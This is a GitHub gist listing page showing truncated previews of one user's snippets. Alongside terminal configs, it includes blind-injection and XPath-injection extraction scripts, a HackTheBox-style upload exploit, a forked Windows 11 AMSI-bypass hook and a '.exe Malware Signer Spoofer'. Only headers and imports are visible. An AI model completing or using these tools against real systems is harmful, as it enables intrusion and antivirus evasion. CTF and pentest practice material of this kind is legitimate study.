Skip to content

Instantly share code, notes, and snippets.

@sharpicx
sharpicx / Microsoft.PowerShell_profile.ps1
Last active May 15, 2025 00:47
windows terminal emulator themes | my windows ricing
Import-Module -Name Terminal-Icons
Import-Module PSReadLine
Set-PSReadLineOption -PredictionSource History
Import-Module PSFzf
#Set-PsFzfOption -PSReadlineChordProvider 'Ctrl+t' -PSReadlineChordReverseHistory 'Ctrl+r'
function Fzf-PSReadLineHistory {
Add-Type -AssemblyName System.Windows.Forms
$history = Get-Content (Get-PSReadLineOption).HistorySavePath | Out-String -Stream
$selected = $history | fzf --height=40% --reverse --layout=reverse
if ($selected) {
@sharpicx
sharpicx / a.py
Created May 14, 2025 23:36
time-based lagi
import requests
import json
import string
import copy
import time
import os
printable_chars = list(map(ord, string.printable)) + [0]
dashboard_token = None
extracted = ''
@sharpicx
sharpicx / a.java
Last active January 30, 2025 20:55
hm
import java.util.Base64;
import java.security.MessageDigest;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.HexFormat;
class Main {
public static byte[] f44153a = {104, 51, 94, 37, 52, 126, 115, 120, 106, 108, 115, 100, 57, 49};
using System;
using System.Text;
public class HelloWorld
{
public static void Main(string[] args)
{
string banner = "lIlIlIIIlIIllIlIlIIlIIlllIIlllIIlIIlIIIIlIIlIIlIlIIllIlIllIllllllIIIlIlllIIlIIIIllIllllllIlIllIIlIIlIllIlIIlIIlIlIIIlllllIIlIIlllIIlIllIlIIllIIllIIlIllIlIIllIlIlIIllIllllIllllllIllllIIlIIIllIllIIllllIlIIIIlIllIIIIllIlIIlllIIlIIIllIllIIllllIlIIlllIIlIIlIlIIlIllIIlIlIIllIlIllIllllI";
string pleaseEnterThePasswordKey = "lIlIlllllIIlIIlllIIllIlIlIIllllIlIIIllIIlIIllIlIllIllllllIIllIlIlIIlIIIllIIIlIlllIIllIlIlIIIllIlllIllllllIIIlIlllIIlIllllIIllIlIllIllllllIlIlllllIIllllIlIIIllIIlIIIllIIlIIIlIIIlIIlIIIIlIIIllIllIIllIllllIllllllIllIlIIlIIllIlIlIIIIllIllIIIlIlllIlllll";
string winString = "lIlIlIIIlIllIllIlIllIIIl";
@sharpicx
sharpicx / a.cs
Created January 26, 2025 17:57
random
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class HelloWorld
{
public static void Main(string[] args)
@sharpicx
sharpicx / .tmux.conf
Last active October 20, 2024 16:52
macbook .tmux.conf
set -g default-terminal "screen-256color"
setw -g xterm-keys on
set -s escape-time 10
set -sg repeat-time 600
set -s focus-events on
unbind C-b
set -g prefix C-a
set-option -g repeat-time 0
@sharpicx
sharpicx / xpath.py
Created September 25, 2024 17:27
xpath
import requests
import string
import time
from requests.exceptions import ConnectionError
from pwn import log
ext = ""
i = 1
while True:
try:
@sharpicx
sharpicx / a.py
Created September 4, 2024 07:04
GreenHorn
import requests
import readline
from requests_toolbelt.multipart.encoder import MultipartEncoder
def print_colored(text, color_code):
print(f"\033[{color_code}m{text}\033[0m")
def upload():
login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
@sharpicx
sharpicx / AmsiContextHook.cpp
Created August 7, 2024 18:11 — forked from rxwx/AmsiContextHook.cpp
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
* For the debug build we want:
@sharpicx
sharpicx / signing.py
Created August 4, 2024 09:27
.exe Malware Signer Spoofer
import random
import sys
from OpenSSL import crypto
from pathlib import Path
from ssl import get_server_certificate
from subprocess import call, PIPE
from os import system
from random import randrange, randint, uniform, shuffle, SystemRandom
from string import ascii_letters